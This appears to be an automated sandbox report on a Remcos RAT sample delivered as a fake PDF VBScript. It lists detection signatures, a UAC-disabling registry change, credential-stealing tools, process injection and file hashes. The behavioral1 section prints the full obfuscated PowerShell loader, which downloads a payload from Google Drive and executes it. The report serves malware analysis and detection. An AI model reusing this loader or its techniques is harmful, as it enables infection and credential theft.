Malware Analysis Report

2024-12-07 17:30

Sample ID 241112-cz4xassgqa
Target 794df456648b056ba688154bd73bbff754c8a7932a9d9dd5b27f4ad6986c60cf.zip
SHA256 794df456648b056ba688154bd73bbff754c8a7932a9d9dd5b27f4ad6986c60cf
Tags
discovery remcos remotehost collection credential_access evasion rat stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

794df456648b056ba688154bd73bbff754c8a7932a9d9dd5b27f4ad6986c60cf

Threat Level: Known bad

The file 794df456648b056ba688154bd73bbff754c8a7932a9d9dd5b27f4ad6986c60cf.zip was found to be: Known bad.

Malicious Activity Summary

discovery remcos remotehost collection credential_access evasion rat stealer trojan

UAC bypass

Remcos family

Remcos

NirSoft WebBrowserPassView

Detected Nirsoft tools

NirSoft MailPassView

Uses browser remote debugging

Blocklisted process makes network request

Checks computer location settings

Accesses Microsoft Outlook accounts

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of NtSetInformationThreadHideFromDebugger

System Location Discovery: System Language Discovery

Enumerates physical storage devices

System Network Configuration Discovery: Internet Connection Discovery

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Modifies registry key

Suspicious use of SetWindowsHookEx

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious behavior: MapViewOfSection

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-12 02:31

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-12 02:31

Reported

2024-11-12 02:34

Platform

win7-20240729-en

Max time kernel

16s

Max time network

17s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11315781264·pdf.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A

Enumerates physical storage devices

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11315781264·pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Undiscriminatingness Vodun Hervards Folkefrontsregeringen Carmakers #><#Polyhedrons Versionsnavnenes Baalets Quadrennially Catarines Recondite #>$Disleaf100='Mrtel';function Moderates7($Trdestens){If ($host.DebuggerEnabled) {$Flood++;$effectualnesses=$Trdestens.'Length' - $Flood} for ( $Foelelsen=4;$Foelelsen -lt $effectualnesses;$Foelelsen+=5){$Brillanters151=$Foelelsen;$Sippingly+=$Trdestens[$Foelelsen]}$Sippingly}function forsrgelseskommunernes($Primrfilers){ .($Modkandidaten) ($Primrfilers)}$Lossen=Moderates7 'Forgn KnoeGe,vtBist.Jeh w Vs.EEndybUnsecAlkol,eroIAspieSandn Re.Tco n ';$Splanchnopleure=Moderates7 'Kl.tM iaoK.gezTugti ClelFormlPrewaBac /Redi ';$flintres=Moderates7 ' sogTOrgalSupesColp1Unus2 ryn ';$Kliniskes='Mail[Rac,NGluce SquTOmsi.StresParneBasiR L mv kerIHe,sC Ko etwelPUnesOCe tiR giNPolyT amuMa,baASashng teAGenfG AirEAngrr ent]B ug: Ryk:,eenSDogseMar,cBet.U olsROm yI rigTPyrrYFl.nPclavr Couo FortMedio beecCharoSp oL ,ev=stud$OpspfBioglTummi ormN Sn.TParlrUlykeOf dSMoze ';$Splanchnopleure+=Moderates7 ' aje5Cas .fors0Skar T sk( imiW,okuiOrddnDo.adsteroAy twF,apsNu z V,nNchroTErob rot 1Cens0Type.Prod0Hove;Te r SensW nci Keln B.a6 Rec4Fakt;Dile MichxUdfo6Gyld4Klor;Exhu UnmrRentvtext: es1 Ill3Eret1aper.None0Reve) Ant Cu.GProgeP rocpalikRn,eo Hai/ .ap2,ede0 Ful1E,in0 Bu 0cata1Ud,l0,ovn1Li.p RevoFP.ntiSalgrTurbeSl gfakt o A txf ls/ Pec1N vl3De.e1Len .Nic 0Dipl ';$Umodenhedens246=Moderates7 'Ss.euLuneSMultEA roRComi-DkssAPadagSymmEPl tNSolltSted ';$Tallit=Moderates7 'R.buhPondtGud tThurpImpusAfse:Chid/anas/kr,pdDobbrTruci Cr,v Plue eng.Uds,gTayioTradoel kgImmalS.gne ush.Leibc SkroBorrmAn i/SquauBru,c.ors?PerreI loxNonspPreso Omsr ventQuod=PluvdSulpo BlewDiscnarenlNeuro Disa MoldImpr&Ph,sibungd kor=Karr1Siph1kejs6EsopG tepeBortVKlipSBeelxO tjaforu7StarC tifmMelo0 .esvFlorf M,lwMu.r2 Up zOve t EnapT,fnBEquimsaggqTa aL Bie8DialUVariy Me,A,orsNPancdC muA ap_Topao eal ';$Udfrselsforbuddets=Moderates7 'Quar>,yan ';$Modkandidaten=Moderates7 ' MidiGua EFes xDo e ';$Par='Problemfrit';$Skridfastes='\Banebryderes.Non';forsrgelseskommunernes (Moderates7 '.den$F kagLogalPagiOTem bF,miA arLP,is: Faxe C,nsRej rBeg o CurgS,egsEndo= ymn$Mas eKnleNCracV Cli:Le.saSkaaP Medp irsdN.npA Inft ho aBism+T mm$TranSWaivKMlkeREkspIRecrdUdprFOverARi oSUdbyT soEGropsFil ');forsrgelseskommunernes (Moderates7 'Andr$SeveGSkurlMks.O nsBFordAA baLCe.s:TidsCs enrPersoSammTKli aPirqp rimhEnthI Gauo RednBrnd=Efte$FisstTrinAVeinLE taLProtiHereT Per.DobbSS,eaP atal C,eIHypoTFras(Til.$U inuUnmuD ameF uborUvejSUroceHalel MooSDsleFPar,OH.ikRtopfbBogpu heDRaadD FriELapaT orss Dat)S,ot ');forsrgelseskommunernes (Moderates7 $Kliniskes);$Tallit=$Crotaphion[0];$Mytologiers=(Moderates7 'Preg$FodngIndklBlodoOpd,B alaDesslWarm:di essvmmITeleLKarrjRe mAHankSPort=CellNSkrieFadeW K,i-,lado D bB ArbJAsice CatCd,rmTHngt .ncrSVareyReacs E stUskaenutiMM lo. Art$ TriLFatto zygsGlauSpatcE ropnOv r ');forsrgelseskommunernes ($Mytologiers);forsrgelseskommunernes (Moderates7 'halv$UnfoSForriWooll refjKajaaA unsLigh.Cou.H ngeeVandaOu.tdT lbe afrr,allsdest[,epa$,ntaUI,gem TjroHidsdLarmeCycanAfbrhUvaneRoerd Do eFa.tnA,tisUsmm2 Fal4Resr6 Fe,] Eng=Bear$SkadS KetpAutolR,baa RepnTro csarahEpocn,agso wepOrdelskileAno upla r ndeFdre ');$Rumpadder=Moderates7 'Radi$SessSbi ti S,nlU etjfro a OopsUdfr.Unw DR ugoAutow azan koblscraoSpidaMaa dJarvFPoesiS bslTaveePros(Soci$,ourTForea Fril R nlThioi SubtRefu,To p$EutyV alvaBasnmSupesUrok)Goat ';$Vams=$Esrogs;forsrgelseskommunernes (Moderates7 'Flas$Photg,ontlAlimoDanuBHonnaZ ielLa d:SkrapInp R StrIOystoVo,eR BrniIgant.eriemazaT Ales udsRStryk Pyck ase draf NaiLVindG.ncoeUnde=C ma(DesatLi rE RedsEksptDege-F empCirkamangtVernhLekt Busf$skriVSladaPeccM.ortsMeso)Tils ');while (!$Prioritetsrkkeflge) {forsrgelseskommunernes (Moderates7 'Reri$TaargBanelMi toindpb F mareselTerm:YusdMMoraaFinapKlerpC.pteBillrEcho=Post$BrnetEmmer.lagu Drie rei ') ;forsrgelseskommunernes $Rumpadder;forsrgelseskommunernes (Moderates7 'BromsRespTVelsaTierRSta tStre- MovSInteLArcheKuldeundfp.qui Gran4Disa ');forsrgelseskommunernes (Moderates7 'Numm$UnreG AsmLOutsoM ltb lumA.ellL.ale: A sPLiftrOrnai irco ThaR,mbriFerrTSha eMeddtNonlsobskRF euKAn rKHandEKol,f IntL P.pg.ynfe,rab=Pist(Hus,tsys.e mansStjkTEksp- alpNataAOptoTModeHTord Anf$SupeV.ndka AntMOvers Jv.)Pann ') ;forsrgelseskommunernes (Moderates7 'sw n$SexgGAposLLideOEl ebunpeANonsLSita:MispR DrueSalvPTil EInderPhotKSe i= Lud$GromgG rnlElatO TriBTheoaMillL Exu:P ela Hetu allGUkbuUjoggSLizetAssuSAcetNCha D iera Ma,gBnkh+ko p+Tere%Pree$ lsdC FhorIsomoPerit BreaForeP GreHKoloiMicro lgtNGasa.Ret C ropoPounuMalmnAlumtNons ') ;$Tallit=$Crotaphion[$Reperk]}$poncho=321965;$Yawn=30428;forsrgelseskommunernes (Moderates7 'Elfo$Stefg UnbLCiliO C eBverdA DatLmela:PlejNAffueEnemPiridHhrecrIrr e DefCinditRoduAForeSSneaIEvapa Ye Chac=Proe BakuGS,iceTvist dr-meascBassORa iN.leuT Ture Tann JerTnrin yd r$S.ndVStruA yrmS.lss us ');forsrgelseskommunernes (Moderates7 'Udeb$ForbgCheel.enaoBirrbFor a.bdulHvil:DokuEMulmx KamsFolkeChokrRevitReunsHjfo Con =Bekl Ha.i[ InjSApriySirpsS lhtIndde Form Akk.BippC OveoFljdnarguvCu ue.nuer ToptMisp] Sot:Serv:BaadFKenirShunoIn emG,veB,eroaPasssAn.meCann6 len4InanSA oxtArcurGi tiOutlnAfragU de( Att$OogeNfugueVanlpUns,hRonirAn.ueAp rcRaditElekaTusksSpitiForvabegr)Bane ');forsrgelseskommunernes (Moderates7 'Vaga$ onGProclParaOUre BSilvaVestlPapi: S.rsDe omO,snAInamaZ naFK,nseInefj,ugsLMerssDoor Camo= Mon Str[Fa,ssRtehyEkspsDelttrecieFladMForb.ArbeTBezoE,vigX VdeT Chi.BeefECinnN roccBeskoFormd,rumiIn oNL anGBu l]Pare:bygn:MongA P fsPyraCOpbliCin.IBema.Ome gHinge GenT UdvsHumrtInfarVil ITilhNUsliGF,tt(Macr$D,ueE Lo xPhocs leENonerar.et.eleSMell)Afs ');forsrgelseskommunernes (Moderates7 'Rusl$syl GDerfl aphOQuasbB.spABundlF it:Te.bot ktP KomPBeleIGr,yGJapaN ImpoLemaRsid a V.dT,oveESpio=Me e$FabrsAbelmHyd AR dhAStilf Ov eF,reJSyndL finS T v.PaspSSkyhusig BRecosTlpetBl dRc uniSangn NonG Cha(Lill$trosPR.maOStyln.ericO,sth,nfrO al.,Geog$Skn.YTvrfaRuggwNewsnToha) onc ');forsrgelseskommunernes $Oppignorate;"

Network

Files

C:\Users\Admin\AppData\Local\Temp\CabFE00.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

memory/2888-20-0x000007FEF5A9E000-0x000007FEF5A9F000-memory.dmp

memory/2888-21-0x000000001B610000-0x000000001B8F2000-memory.dmp

memory/2888-23-0x0000000001FC0000-0x0000000001FC8000-memory.dmp

memory/2888-22-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

memory/2888-24-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

memory/2888-25-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

memory/2888-26-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

memory/2888-27-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

memory/2888-28-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

memory/2888-29-0x000007FEF5A9E000-0x000007FEF5A9F000-memory.dmp

memory/2888-30-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

memory/2888-31-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

memory/2888-32-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-12 02:31

Reported

2024-11-12 02:34

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

153s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11315781264·pdf.vbs"

Signatures

Remcos

rat remcos

Remcos family

remcos

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

Detected Nirsoft tools

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

NirSoft MailPassView

Description Indicator Process Target
N/A N/A N/A N/A

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Windows\SysWOW64\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1192 set thread context of 4104 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 1192 set thread context of 2800 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 1192 set thread context of 2744 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1616 wrote to memory of 476 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1616 wrote to memory of 476 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2820 wrote to memory of 1192 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 2820 wrote to memory of 1192 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 2820 wrote to memory of 1192 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 2820 wrote to memory of 1192 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 1192 wrote to memory of 3392 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\cmd.exe
PID 1192 wrote to memory of 3392 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\cmd.exe
PID 1192 wrote to memory of 3392 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\cmd.exe
PID 3392 wrote to memory of 1268 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3392 wrote to memory of 1268 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3392 wrote to memory of 1268 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1192 wrote to memory of 1036 N/A C:\Windows\SysWOW64\msiexec.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1192 wrote to memory of 1036 N/A C:\Windows\SysWOW64\msiexec.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1036 wrote to memory of 772 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1036 wrote to memory of 772 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1192 wrote to memory of 4104 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 1192 wrote to memory of 4104 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 1192 wrote to memory of 4104 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 1192 wrote to memory of 4104 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 1192 wrote to memory of 2800 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 1192 wrote to memory of 2800 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 1192 wrote to memory of 2800 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 1192 wrote to memory of 2800 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 1192 wrote to memory of 2744 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 1192 wrote to memory of 2744 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 1192 wrote to memory of 2744 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 1192 wrote to memory of 2744 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 1036 wrote to memory of 2648 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1036 wrote to memory of 2648 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1036 wrote to memory of 2648 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1036 wrote to memory of 2648 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1036 wrote to memory of 2648 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1036 wrote to memory of 2648 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1036 wrote to memory of 2648 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1036 wrote to memory of 2648 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1036 wrote to memory of 2648 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1036 wrote to memory of 2648 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1036 wrote to memory of 2648 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1036 wrote to memory of 2648 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1036 wrote to memory of 2648 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1036 wrote to memory of 2648 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1036 wrote to memory of 2648 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
